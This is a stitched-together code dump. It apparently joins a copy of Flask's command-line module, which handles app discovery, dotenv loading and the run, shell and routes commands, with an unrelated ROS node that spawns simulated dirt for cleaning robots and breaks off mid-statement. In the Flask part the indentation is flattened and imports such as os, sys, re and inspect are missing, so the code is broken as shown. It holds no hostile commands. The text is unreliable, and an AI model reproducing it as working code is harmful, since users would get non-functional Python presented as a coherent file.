import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock, Thread
import click
from werkzeug.utils import import_string
from . import __version__
from ._compat import getargspec, itervalues, reraise, text_type
from .globals import current_app
from .helpers import get_debug_flag, get_env, get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ('app', 'application'):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [
v for v in itervalues(module.__dict__) if isinstance(v, Flask)
]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
'Detected multiple Flask applications in module "{module}". Use '
'"FLASK_APP={module}:name" to specify the correct '
'one.'.format(module=module.__name__)
)
# Search for app factory functions.
for attr_name in ('create_app', 'make_app'):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
'Detected factory "{factory}" in module "{module}", but '
'could not call it without arguments. Use '
'"FLASK_APP=\'{module}:{factory}(args)\'" to specify '
'arguments.'.format(
factory=attr_name, module=module.__name__
)
)
raise NoAppException(
'Failed to find Flask application or factory in module "{module}". '
'Use "FLASK_APP={module}:name to specify one.'.format(
module=module.__name__
)
)
def call_factory(script_info, app_factory, arguments=()):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
args_spec = getargspec(app_factory)
arg_names = args_spec.args
arg_defaults = args_spec.defaults
if 'script_info' in arg_names:
return app_factory(*arguments, script_info=script_info)
elif arguments:
return app_factory(*arguments)
elif not arguments and len(arg_names) == 1 and arg_defaults is None:
return app_factory(script_info)
return app_factory()
def _called_with_wrong_args(factory):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param factory: the factory function that was called
:return: true if the call failed
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is factory.__code__:
# in the factory, it was called successfully
return False
tb = tb.tb_next
# didn't reach the factory
return True
finally:
del tb
def find_app_by_string(script_info, module, app_name):
"""Checks if the given string is a variable name or a function. If it is a
function, it checks for specified arguments and whether it takes a
``script_info`` argument and calls the function with the appropriate
arguments.
"""
from flask import Flask
match = re.match(r'^ *([^ ()]+) *(?:\((.*?) *,? *\))? *$', app_name)
if not match:
raise NoAppException(
'"{name}" is not a valid variable name or function '
'expression.'.format(name=app_name)
)
name, args = match.groups()
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(e.args[0])
if inspect.isfunction(attr):
if args:
try:
args = ast.literal_eval('({args},)'.format(args=args))
            except (ValueError, SyntaxError) as e:
raise NoAppException(
'Could not parse the arguments in '
'"{app_name}".'.format(e=e, app_name=app_name)
)
else:
args = ()
try:
app = call_factory(script_info, attr, args)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
'{e}\nThe factory "{app_name}" in module "{module}" could not '
'be called with the specified arguments.'.format(
e=e, app_name=app_name, module=module.__name__
)
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
'A valid Flask application was not obtained from '
'"{module}:{app_name}".'.format(
module=module.__name__, app_name=app_name
)
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == '.py':
path = fname
if os.path.basename(path) == '__init__':
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, '__init__.py')):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return '.'.join(module_name[::-1])
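# Illustrative example (not part of Flask): given a layout of
#   project/pkg/__init__.py and project/pkg/app.py,
# prepare_import('project/pkg/app.py') walks up past the package, inserts the
# absolute path of 'project' onto sys.path, and returns 'pkg.app'.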
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise NoAppException(
'While importing "{name}", an ImportError was raised:'
'\n\n{tb}'.format(name=module_name, tb=traceback.format_exc())
)
elif raise_if_not_found:
raise NoAppException(
'Could not import "{name}".'.format(name=module_name)
)
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
message = 'Flask %(version)s\nPython %(python_version)s'
click.echo(message % {
'version': __version__,
'python_version': sys.version,
}, color=ctx.color)
ctx.exit()
version_option = click.Option(
['--version'],
help='Show the flask version',
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True
)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo(object):
"""Help object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
    onwards as a click object.
"""
def __init__(self, app_import_path=None, create_app=None,
set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get('FLASK_APP')
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
        this multiple times will simply return the already loaded app.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
app = None
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (self.app_import_path.split(':', 1) + [None])[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ('wsgi.py', 'app.py'):
import_name = prepare_import(path)
app = locate_app(self, import_name, None,
raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
'Could not locate a Flask application. You did not provide '
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
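    # Resolution order implemented in load_app above, illustrated with
    # hypothetical values:
    #   1. the create_app callback, if one was passed to this ScriptInfo;
    #   2. FLASK_APP / app_import_path, e.g. FLASK_APP="hello:create_app('dev')"
    #      -> prepare_import('hello') plus find_app_by_string(..., "create_app('dev')"),
    #      which parses the factory name and calls it with the args ('dev',);
    #   3. otherwise "wsgi.py" and then "app.py" in the current directory.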
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop('with_appcontext', True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault('cls', AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
    For information about why this is useful see :ref:`custom-scripts`.
    :param add_default_commands: if this is True then the default run and
        shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(self, add_default_commands=True, create_app=None,
add_version_option=True, load_dotenv=True,
set_debug_flag=True, **extra):
params = list(extra.pop('params', None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points('flask.commands'):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
# However, we will not do so silently because that would confuse
# users.
traceback.print_exc()
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ['FLASK_RUN_FROM_CLI'] = 'true'
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get('obj')
if obj is None:
obj = ScriptInfo(create_app=self.create_app,
set_debug_flag=self.set_debug_flag)
kwargs['obj'] = obj
kwargs.setdefault('auto_envvar_prefix', 'FLASK')
return super(FlaskGroup, self).main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path):].lstrip(os.sep)) == other
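# Two illustrative cases (a plain string-prefix check would get the second one wrong):
#   _path_is_ancestor('/a', '/a/b') -> True   ('b' re-joined to '/a' gives '/a/b')
#   _path_is_ancestor('/a', '/ab')  -> False  ('b' re-joined to '/a' gives '/a/b', not '/ab')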
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
Changes the current working directory to the location of the first file
found, with the assumption that it is in the top level project directory
and will be where the Python path should import local packages from.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile('.env') or os.path.isfile('.flaskenv'):
click.secho(
' * Tip: There are .env or .flaskenv files present.'
' Do "pip install python-dotenv" to use them.',
fg='yellow')
return
if path is not None:
return dotenv.load_dotenv(path)
new_dir = None
for name in ('.env', '.flaskenv'):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
if new_dir and os.getcwd() != new_dir:
os.chdir(new_dir)
return new_dir is not None # at least one file was located and loaded
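# Illustration of the precedence described in the docstring (hypothetical files):
# if .env sets FLASK_ENV=production and .flaskenv sets FLASK_ENV=development,
# .env is found and loaded first, and since already-set variables are not
# overwritten the later .flaskenv value is ignored, so FLASK_ENV stays
# "production".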
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get('WERKZEUG_RUN_MAIN') == 'true':
return
if app_import_path is not None:
message = ' * Serving Flask app "{0}"'.format(app_import_path)
if not eager_loading:
message += ' (lazy loading)'
click.echo(message)
click.echo(' * Environment: {0}'.format(env))
if env == 'production':
click.secho(
' WARNING: Do not use the development server in a production'
' environment.', fg='red')
click.secho(' Use a production WSGI server instead.', dim=True)
if debug is not None:
click.echo(' * Debug mode: {0}'.format('on' if debug else 'off'))
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = 'path'
def __init__(self):
self.path_type = click.Path(
exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == 'adhoc':
try:
import OpenSSL
except ImportError:
raise click.BadParameter(
'Using ad-hoc certificates requires pyOpenSSL.',
ctx, param)
return value
obj = import_string(value, silent=True)
if sys.version_info < (2, 7, 9):
if obj:
return obj
else:
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get('cert')
is_adhoc = cert == 'adhoc'
if sys.version_info < (2, 7, 9):
is_context = cert and not isinstance(cert, (text_type, bytes))
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.',
ctx, param)
if is_context:
raise click.BadParameter(
                'When "--cert" is an SSLContext object, "--key" is not used.',
ctx, param)
if not cert:
raise click.BadParameter(
'"--cert" must also be specified.',
ctx, param)
ctx.params['cert'] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter(
'Required when using "--cert".',
ctx, param)
return value
@click.command('run', short_help='Runs a development server.')
@click.option('--host', '-h', default='127.0.0.1',
help='The interface to bind to.')
@click.option('--port', '-p', default=5000,
help='The port to bind to.')
@click.option('--cert', type=CertParamType(),
help='Specify a certificate file to use HTTPS.')
@click.option('--key',
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key, expose_value=False,
help='The key file to use when specifying a certificate.')
@click.option('--reload/--no-reload', default=None,
help='Enable or disable the reloader. By default the reloader '
'is active if debug is enabled.')
@click.option('--debugger/--no-debugger', default=None,
help='Enable or disable the debugger. By default the debugger '
'is active if debug is enabled.')
@click.option('--eager-loading/--lazy-loader', default=None,
help='Enable or disable eager loading. By default eager '
'loading is enabled if the reloader is disabled.')
@click.option('--with-threads/--without-threads', default=True,
help='Enable or disable multithreading.')
@pass_script_info
def run_command(info, host, port, reload, debugger, eager_loading,
with_threads, cert):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
if eager_loading is None:
eager_loading = not reload
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(host, port, app, use_reloader=reload, use_debugger=debugger,
threaded=with_threads, ssl_context=cert)
@click.command('shell', short_help='Runs a shell in the app context.')
@with_appcontext
def shell_command():
"""Runs an interactive Python shell in the context of a given
Flask application. The application will populate the default
    namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = 'Python %s on %s\nApp: %s [%s]\nInstance: %s' % (
sys.version,
sys.platform,
app.import_name,
app.env,
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get('PYTHONSTARTUP')
if startup and os.path.isfile(startup):
with open(startup, 'r') as f:
eval(compile(f.read(), startup, 'exec'), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command('routes', short_help='Show the routes for the app.')
@click.option(
'--sort', '-s',
type=click.Choice(('endpoint', 'methods', 'rule', 'match')),
default='endpoint',
help=(
'Method to sort routes by. "match" is the order that Flask will match '
'routes when dispatching a request.'
)
)
@click.option(
'--all-methods',
is_flag=True,
help="Show HEAD and OPTIONS methods."
)
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo('No routes were registered.')
return
ignored_methods = set(() if all_methods else ('HEAD', 'OPTIONS'))
if sort in ('endpoint', 'rule'):
rules = sorted(rules, key=attrgetter(sort))
elif sort == 'methods':
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [
', '.join(sorted(rule.methods - ignored_methods)) for rule in rules
]
headers = ('Endpoint', 'Methods', 'Rule')
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = '{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}'.format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*('-' * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
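# Example output shape of the command above (hypothetical app with two routes,
# HEAD/OPTIONS hidden because --all-methods was not passed):
#   Endpoint  Methods    Rule
#   --------  ---------  -----------
#   index     GET        /
#   user      GET, POST  /user/<id>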
cli = FlaskGroup(help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd='export' if os.name == 'posix' else 'set',
prefix='$ ' if os.name == 'posix' else '> '
))
def main(as_module=False):
args = sys.argv[1:]
if as_module:
this_module = 'flask'
if sys.version_info < (2, 7):
this_module += '.cli'
name = 'python -m ' + this_module
# Python rewrites "python -m flask" to the path to the file in argv.
# Restore the original command so that the reloader works.
sys.argv = ['-m', this_module] + args
else:
name = None
cli.main(args=args, prog_name=name)
if __name__ == '__main__':
main(as_module=True)
|
DirtGenerator.py
|
#! /usr/bin/env python3
import random
import numpy
import copy
import threading
import math
from typing import List
import rospy
import rospkg
from nav_msgs.msg import OccupancyGrid
from gazebo_msgs.srv import DeleteModel, SpawnModel
from geometry_msgs.msg import Pose, Point, Quaternion, TransformStamped, Transform, Vector3
from std_msgs.msg import Header
from goal_manager_msgs.msg import GoalObject, GoalObjectList, DirtModel
from commons.OccupancyMap import OccupancyMap, Cell
# Node name
NODE_NAME = 'dirt_generator'
# Topics and services
# BASE_MAP_TOPIC = '/robot_0/map'
BASE_MAP_TOPIC = 'modified_occupancy_grid'
ACTIVE_TASKS_TOPIC = 'active_tasks'
NEW_DIRT_TOPIC = 'new_dirt'
NEW_DIRT_GOALOBJECT_TOPIC = 'new_dirt_goalObject' # same as new dirt topic but of type GoalObject
# Gazebo model params
DIRT_MODEL_NAME = "dirt_object_undetected.sdf"
DIRT_MODEL_PACKAGE = "dirt_generator"
# Seed to be used during the simulation
SEED = 120
# Limits of the robot movement area on the world map (the robot cannot move outside these bounds)
X_MIN_IN = -5.0
X_MAX_IN = 5.0
Y_MIN_IN = -5.0
Y_MAX_IN = 5.0
# Min and max values for random timers
TIME_MIN = 10
TIME_MAX = 10
# Min and max trust level, that is, amount of confidence about the dirt observation
TRUST_MIN = 100
TRUST_MAX = 100
# Debug control constant
DEBUG_ON = True
class DirtGenerator:
def __init__(self, seed, spawn_interval):
self.position_map: List[Point] = []
self.spawn_number: int = 1
self.robot_size: float = 0.105 * 2
self.dirt_pos_tolerance: float = 0.25
self.occupancy_map: OccupancyGrid
self.active_dirt_list: List[GoalObject] = list()
self.model_pub = None
self.goal_pub = None
self.scan_sub = None
self.active_tasks_sub = None
self.seed = seed
self.time_interval_min = spawn_interval
self.time_interval_max = spawn_interval
self.occupancy_map = None
self.__init_publishers()
self.__init_subscribers()
# Getting parameters from parameter server
self.false_positive = rospy.get_param('~false_positive', False)
if self.false_positive:
self.num_robots = rospy.get_param('~no_of_robots')
self.fpp_props = numpy.zeros(self.num_robots)
            # TODO: What about 0 probability, i.e. disabling FP for one of them
            # Assume robots are labelled robot_0_... with increasing integers
for i in range(0,self.num_robots):
self.fpp_props[i] = rospy.get_param('~robot_%d_fpp'%i)
# convert probabilities into timers
fp_spawn_intervals = (1.0 - self.fpp_props) / self.fpp_props * spawn_interval
# Store all spawn intervals in this array. The order is ground truth, robot 0, robot 1, ...
self.spawn_intervals = numpy.zeros(self.num_robots + 1)
self.spawn_intervals[0] = spawn_interval
self.spawn_intervals[1:] = fp_spawn_intervals
rospy.loginfo(f"[{NODE_NAME}] node is ready - "
                      f"\n\tlistening for active goals on '{self.active_tasks_sub.resolved_name}'"
f"\n\tpublishing new random dirt to '{self.model_pub.resolved_name}'")
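    # Worked example for the false-positive interval formula above (assumed
    # values): with spawn_interval = 10 s and robot_0_fpp = 0.2, that robot's
    # false-positive timer becomes (1.0 - 0.2) / 0.2 * 10 = 40 s, i.e. roughly
    # one false positive for every four ground-truth dirt objects, which
    # matches a false-positive fraction of 0.2 for that robot.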
def __init_subscribers(self):
self.active_tasks_sub = rospy.Subscriber(ACTIVE_TASKS_TOPIC,
GoalObjectList, self.__active_tasks_cb)
def __init_publishers(self):
self.model_pub = rospy.Publisher(NEW_DIRT_TOPIC, DirtModel, queue_size=100)
self.goal_pub = rospy.Publisher(NEW_DIRT_GOALOBJECT_TOPIC, GoalObject, queue_size=100)
def __active_tasks_cb(self, combined_list):
# Save the received list with all currently active dirt and goals (from topic all_current_dirt_and_goals)
self.active_dirt_list = list(combined_list.goal_list)
def __comparing_points(self, point1, point2) -> bool:
"""
Compares two Points and returns true if they are identical (same position with some tolerance)
"""
return (abs(point1.x - point2.x) <= self.dirt_pos_tolerance and abs(
point1.y - point2.y) <= self.dirt_pos_tolerance)
    def __check_for_duplicates(self, point, fp_list):
        """
        Goes through the list of all currently active dirt objects and compares their positions with the given
        position. Returns a tuple (duplicate, other_fp_duplicate): for a ground-truth task (empty fp_list) any
        active dirt here makes duplicate True; for a false-positive task, duplicate is True if the position is
        taken by ground truth or an FP of the same robot, and other_fp_duplicate is True if it is only occupied
        by an FP of a different robot (so a new FP task can still be created here).
"""
duplicate = False
other_fp_duplicate = False # flag = true if false positive of other robot occupies position
# Check all already published (active) dirt objects (stored and received from the goal_list)
if len(fp_list) == 1:
for dirt in list(self.active_dirt_list):
if self.__comparing_points(point, dirt.pose.position):
                    print('Checking for duplicates in the FP list; robot being tested: {}, FP list of the '
                          'existing task at this location: {}, task coordinates: {}'.format(fp_list, dirt.fp, point))
if len(dirt.fp) == 0 or fp_list[0] in dirt.fp: # i.e. dirt is ground truth or already fp of that robot.
duplicate = True
return duplicate, other_fp_duplicate
else:
other_fp_duplicate = True
return duplicate, other_fp_duplicate
else:
# Ground Truth
for dirt in list(self.active_dirt_list):
if self.__comparing_points(point, dirt.pose.position):
duplicate = True
return duplicate, other_fp_duplicate
return duplicate, other_fp_duplicate
def __get_cell_index(self, x, y) -> int:
cell_x = int((x - self.occupancy_map.origin.x) / self.occupancy_map.resolution)
cell_y = int((y - self.occupancy_map.origin.y) / self.occupancy_map.resolution)
index = cell_x + cell_y * self.occupancy_map.width
return index
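    # Worked example for the index computation above (assumed map values):
    # with origin = (-5.0, -5.0), resolution = 0.05 and width = 200 cells, the
    # world point (0.0, 0.0) maps to cell_x = cell_y = 100 and therefore
    # index = 100 + 100 * 200 = 20100 in the row-major grid array.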
def __is_occupied(self, x, y) -> bool:
"""
Check if the cell at position (x, y) is occupied or not (with a static obstacle like a wall)
"""
cell = self.occupancy_map.world2costmap(self.occupancy_map.costmap2world(Cell(x, y)))
index = self.occupancy_map.to_costmap_index(cell)
return self.occupancy_map.grid[index] != 0
def __is_occupied_(self, x, y) -> bool:
index = self.__get_cell_index(x, y)
return self.occupancy_map.grid[index] != 0
def __has_occupied_neighbors(self, x, y) -> bool:
"""
        Checks if the neighbor cells (mask radius: robot size) of the cell at the given position (x, y) are occupied.
        The mask is probably larger than needed, but that is okay (safer).
"""
# Robot radius in cells (according to OccupancyGrid)
robot_radius = int(math.ceil((self.robot_size / 2) / self.occupancy_map.resolution))
center_index = self.__get_cell_index(x, y)
# Only check the cells in the square around the center with edge length of twice the robot_radius (the center
# cell can be ignored, that is why robot_radius-1)
for r in range(-(robot_radius - 1), (robot_radius - 1)):
            # Strictly not needed because we assume that the robot is symmetrical (the square mask approximates a circle)
for c in range(-(robot_radius - 1), (robot_radius - 1)):
# Now refine the initial square with transforming the mask to a circle (nearly)
if math.floor(math.sqrt(r ** 2 + c ** 2)) <= robot_radius:
current_index = center_index + c + r * self.occupancy_map.width
# if in this circle one of the cells is occupied (!=0), then the given cell is not possible (
# return true)
if self.occupancy_map.grid[current_index] != 0:
return True
# Only if all cells in the circle mask are free, then the given cell is possible as dirt center
return False
def __get_dirt_candidate_cells(self):
while True:
if self.occupancy_map:
                # As soon as the map and its metadata are received (!=0.0), create a static list with all possible positions
x_min = self.occupancy_map.origin.x
y_min = self.occupancy_map.origin.y
                # width spans the x direction and height the y direction (matching __get_cell_index)
                x_max = x_min + self.occupancy_map.width * self.occupancy_map.resolution
                y_max = y_min + self.occupancy_map.height * self.occupancy_map.resolution
x_step = y_step = self.occupancy_map.resolution
# Take always the center position of the grid cells
for x in numpy.arange(x_min + x_step/2, x_max - x_step/2, x_step):
# Take always the center position of the grid cells
for y in numpy.arange(y_min + y_step/2, y_max - y_step/2, y_step):
# Check if it is inside the movement area of the robots
if (X_MIN_IN <= x <= X_MAX_IN) and (Y_MIN_IN <= y <= Y_MAX_IN):
if not self.__is_occupied_(x, y):
self.position_map.append(Point(x=x, y=y, z=0.0))
break
# Sleep one second until self.position_map can be created (occupancy grid, etc. was received)
#rospy.sleep(1)
def __generate_point_based_on_prob(self, fp_list) -> Point:
"""
Generates a random point, based on probabilities (map/distribution)
Returns random point of type Point(x, y, z)
"""
# Use a standard distribution (provided by libs/extern formulas) In this case: Beta distribution
# with alpha=2 and beta=2 (near to normal/Gaussian): ATTENTION: the distribution is applied to a position
# list, which goes row by row through the map. That means the hot spot (in case of Gaussian) is not a perfect
# circle in the middle of the map, but the complete rows in the middle of the map (also their boundary cells)
# We tested it and the distribution is good for our purpose, but keep in mind: it is not a circle in the
# center!
        # Positions where a new task can spawn are empty cells (position_map) or,
        # if the task is a false positive, cells where a false positive of another robot is located.
        # NOTE: self.position_map contains a list of all grid centres which are not a wall and where the robot is
        # not currently positioned. It does not care whether a cell is already occupied by a task.
#all_positions = copy.deepcopy(self.position_map)
#if len(fp_list) == 1: # fp_list should only be size 0 (ground truth) or 1 i.e. single fp
# for task in self.active_dirt_list:
# if len(task.fp) > 0:
# if fp_list[0] not in task.fp:
# all_positions.append(task.pose.position)
index = 0
possible = False
while not possible:
index = int(random.betavariate(2, 2) * len(self.position_map))
x = self.position_map[index].x
y = self.position_map[index].y
# Check for occupied neighbors and only add the position if also the neighboring cells are free (the
            # robot needs some space to reach it); otherwise generate a new one and test it
if not self.__has_occupied_neighbors(x, y):
# If actual spawning of dirt is enabled, then it should also be checked while generating objects
# if another dirt object is already at this position (if so, the generation has to be repeated!)
duplicate, other_fp_duplicate = self.__check_for_duplicates(Point(x, y, 0.0), fp_list)
if not duplicate:
possible = True
else:
rospy.loginfo(
rospy.get_caller_id() + "\n\n\tGenerated dirt at (%f | %f) was refused due to already "
"active dirt at this position (duplicate). Generating next "
"one...\n" % (
x, y))
else:
rospy.loginfo(
rospy.get_caller_id() + "\n\n\tGenerated dirt at (%f | %f) was refused due to occupied neighbor "
